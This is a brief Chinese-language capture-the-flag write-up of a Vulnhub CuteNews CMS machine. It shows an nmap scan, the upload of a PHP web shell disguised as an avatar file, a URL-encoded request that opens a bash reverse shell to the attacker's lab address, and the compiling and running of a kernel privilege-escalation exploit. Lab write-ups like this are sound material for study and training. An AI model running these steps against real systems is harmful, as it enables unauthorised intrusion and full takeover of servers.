[Vulnhub] Simple CuteNews-CMS+Kernel权限提升

Мартин.2024-07-14 21:42

信息收集

IP Address Opening Ports
192.168.8.104 TCP:80

$ nmap -p- 192.168.8.104 --min-rate 1000 -sC -sV

bash 复制代码 
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Please Login / CuteNews
|_http-server-header: Apache/2.4.7 (Ubuntu)

本地权限

注册用户登录

Content-Disposition: form-data; name="avatar_file"; filename="reverse.php"

http://192.168.8.104/uploads/avatar_admin2_reverse.php?cmd=%2Fbin%2Fbash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.8.107%2F10032%200%3E%261%27

权限提升

$ cat /etc/os-release

https://www.exploit-db.com/exploits/36746

$ gcc 36746.c -static -o 36746

# ./36746

相关推荐
独行soc9 小时前
2025年渗透测试面试题总结-264(题目+回答)
网络·python·安全·web安全·网络安全·渗透测试·安全狮
REDcker11 小时前
tcpdump 网络数据包分析工具完整教程
网络·测试工具·tcpdump
若汝棋茗12 小时前
在网络密林中传递轻盈信使 —— TouchSocket 的 UdpSession 探秘
网络
嵌入式-小王12 小时前
每天掌握一个网络协议----ICMP
网络·网络协议·ping
麦麦鸡腿堡12 小时前
Java_网络编程_InetAddress类与Socket类
java·服务器·网络
Awkwardx12 小时前
Linux网络编程—应用层协议HTTP
网络·网络协议·http
4***v21412 小时前
详解 为什么 tcp 会出现 粘包 拆包 问题
网络·tcp/ip·php
老前端的功夫13 小时前
前端浏览器缓存深度解析:从网络请求到极致性能优化
前端·javascript·网络·缓存·性能优化
p666666666815 小时前
vmware虚拟机的三种网络配置详细介绍,包能解决虚拟机网络问题
网络
赖small强15 小时前
【Linux 网络基础】Linux 平台 DHCP 运作原理与握手过程详解
linux·网络·dhcp
热门推荐
01GitHub 镜像站点02BongoCat - 跨平台键盘猫动画工具03【保姆级教程】免费使用Gemini3的5种方法!免翻墙/国内直连04UV安装并设置国内源05安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)06Linux下V2Ray安装配置指南07Labelme从安装到标注:零基础完整指南08“我的电脑”图标没了怎么办 4种方法找回09全球最强模型Grok4,国内已可免费使用!(附教程)10Google Antigravity:无法登录?早期错误、登录修复和用户反馈指南